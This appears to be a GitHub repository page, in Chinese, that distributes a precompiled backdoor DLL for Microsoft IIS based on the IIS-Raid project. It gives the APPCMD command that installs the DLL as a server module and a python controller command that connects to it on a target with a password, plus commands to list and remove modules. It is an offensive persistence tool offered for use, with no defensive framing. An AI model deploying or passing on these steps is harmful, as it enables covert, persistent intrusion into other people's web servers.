Skip to content

Microsoft IIS (Internet信息服务)的本地后门模块

Notifications You must be signed in to change notification settings

AeolusTF/IIS-RAIDBOOR

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

IIS-Backdoor

已经编译好了的dll

源码:https://github.com/0x09AL/IIS-Raid

直接下载 IIS-backdoor.dll

Windows server2012 IIS 8 测试

使用

添加模块

PS C:\Users\Administrator> C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:Module /image:"c:\IIS-Backdoor.dll" /add:true

运行python脚本连接IIS-backdoor.dll

python3 iis_controller.py --url target --password SIMPLEPASS

另外一些模块有关的命令

看一下已经安装的模块

PS C:\Users\Administrator> C:\Windows\system32\inetsrv\APPCMD.EXE list modules

删除已经安装的模块

PS C:\Users\Administrator> C:\Windows\system32\inetsrv\APPCMD.EXE uninstall modules Module

About

Microsoft IIS (Internet信息服务)的本地后门模块

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published